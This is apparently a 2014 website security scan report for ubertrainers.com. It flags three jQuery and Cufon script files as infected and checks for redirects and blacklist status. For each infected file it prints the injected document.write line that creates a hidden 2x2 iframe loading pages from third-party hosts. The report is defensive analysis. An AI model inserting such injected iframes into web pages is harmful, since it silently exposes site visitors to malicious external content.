Scanned pages/files
Request | Server response | Status |
http://ubertrainers.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 11:30:47 GMT Location: http://www.ubertrainers.com.au/ Server: Apache Content-Length: 239 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ubertrainers.com.au/ | 200 OK Content-Length: 19136 Content-Type: text/html | clean |
http://www.ubertrainers.com.au/js/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://ubertrainers.com/js/jquery.corner.js | 200 OK Content-Length: 10218 Content-Type: application/javascript | malicious |
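Malicious code - confirmed by antivirus engines (see below). The injected statement, listed ahead of the file's own plugin code, writes a 2x2-pixel iframe that loads a page from a third-party host: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=1873044></iframe>');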
;(function($) { var style = document.createElement('div').style; var moz = style['MozBorderRadius'] !== undefined; var webkit = style['WebkitBorderRadius'] !== undefined; var radius = style['borderRadius'] !== undefined || style['BorderRadius'] !== undefined; var mode = document.documentMode || 0; } d.appendChild($vert[0]); } } } } }); }; $.fn.uncorner = function() { if (radius || moz || webkit) this.css(radius ? 'border-radius' : moz ? '-moz-border-radius' : '-webkit-border-radius', 0); $('div.jquery-corner', this).remove(); return this; }; $.fn.corner.defaults = { useNative: true, metaAttr: 'data-corner' }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://jmiller3d.com/zowf.html?j=1873044 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=1873044> | ||
http://ubertrainers.com/js/jquery.cycle.all.js | 200 OK Content-Length: 43073 Content-Type: application/javascript | malicious |
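Malicious code - confirmed by antivirus engines (see below). The injected statement, listed ahead of the file's own plugin code, writes a 2x2-pixel iframe that loads a page from a third-party host: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://herohouse.com/zomd.html?j=1873044></iframe>');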
;(function($) { var ver = '2.72'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie) }; } function debug(s) { if ($.fn.cycle.debug) log(s); } function log() { if (window.console && window.console.log) window.console.log('[cycle] ' var bb = b < h ? b + parseInt(step * ((h-b)/count || 1)) : h; var rr = r < w ? r + parseInt(step * ((w-r)/count || 1)) : w; $next.css({ clip: 'rect('+tt+'px '+rr+'px '+bb+'px '+ll+'px)' }); (step++ <= count) ? setTimeout(f, 13) : $curr.css('display', 'none'); })(); }); opts.cssBefore = { display: 'block', opacity: 1, top: 0, left: 0 }; opts.animIn = { left: 0 }; opts.animOut = { left: 0 }; }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://herohouse.com/zomd.html?j=1873044 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://herohouse.com/zomd.html?j=1873044> | ||
http://ubertrainers.com/js/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://ubertrainers.com/js/Geogrotesque_Lg_300.font.js | 200 OK Content-Length: 201978 Content-Type: application/javascript | clean |
http://ubertrainers.com/js/Geogrotesque_Bd_700.font.js | 200 OK Content-Length: 194103 Content-Type: application/javascript | clean |
http://ubertrainers.com/js/cufon-replace.js | 200 OK Content-Length: 1746 Content-Type: application/javascript | malicious |
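Malicious code - confirmed by antivirus engines (see below). The injected statement, listed ahead of the file's own code, writes a 2x2-pixel iframe that loads a page from a third-party host: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=1873044></iframe>');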
Cufon.replace('div.captionArea h2', { fontFamily: 'Geogrotesque Lg', fontSize: '24px' }); Cufon.replace('span.headNormal', { fontFamily: 'Geogrotesque Lg', fontSize: '32px', letterSpacing:'-1px' }); Cufon.replace('span.headBold', { fontFamily: 'Geogrotesque Bd', fontSize: '32px', fontWeight:'bold' }); Cufon.r Cufon.replace('span.courseBoldOrange', { fontFamily: 'Geogrotesque Bd', fontSize: '28px', fontWeight:'bold' }); Cufon.replace('span.courseBoldBlack', { fontFamily: 'Geogrotesque Bd', fontSize: '23px', fontWeight:'bold' }); Cufon.replace('div.UrbenBusiness_Container_orange', { fontFamily: 'Geogrotesque Lg', fontSize: '20px' }); Cufon.replace('div.news_container h1', { fontFamily: 'Geogrotesque Bd', fontSize: '15px' }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://jmiller3d.com/zowf.html?j=1873044 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=1873044> | ||
http://ubertrainers.com/js/ddsmoothmenu.js | 200 OK Content-Length: 6604 Content-Type: application/javascript | clean |
http://ubertrainers.com/Accredited-Training | 200 OK Content-Length: 22270 Content-Type: text/html | clean |
http://ubertrainers.com/js/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://ubertrainers.com/about | 200 OK Content-Length: 18622 Content-Type: text/html | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6875 Content-Type: text/javascript | clean |
http://ubertrainers.com/about/testimonials | 200 OK Content-Length: 19011 Content-Type: text/html | clean |
http://ubertrainers.com/about/js/jquery.min.js | 404 Not Found Content-Length: 18013 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ubertrainers.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 11:30:47 GMT
Location: http://www.ubertrainers.com.au/
Server: Apache
Content-Length: 239
Content-Type: text/html; charset=iso-8859-1
...239 bytes of data.
GET / HTTP/1.1
Host: ubertrainers.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 11:30:47 GMT
Location: http://www.ubertrainers.com.au/
Server: Apache
Content-Length: 239
Content-Type: text/html; charset=iso-8859-1
...239 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ubertrainers.com
Referer: http://www.google.com/search?q=ubertrainers.com
Result:
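The result is similar to the first query: no suspicious redirects were found. This check varies only the Referer header, so a redirect conditioned on something else (user agent, cookies, client IP) would not show up here.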
GET / HTTP/1.1
Host: ubertrainers.com
Referer: http://www.google.com/search?q=ubertrainers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ubertrainers.com
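Result: This site is not currently listed as suspicious. (A blacklist lookup reflects only what the list operator has already crawled and published; it does not contradict the injected iframes found in the scanned files above.)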
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ubertrainers.com/
Result: ubertrainers.com is not infected or malware details are not published yet.
Result: ubertrainers.com is not infected or malware details are not published yet.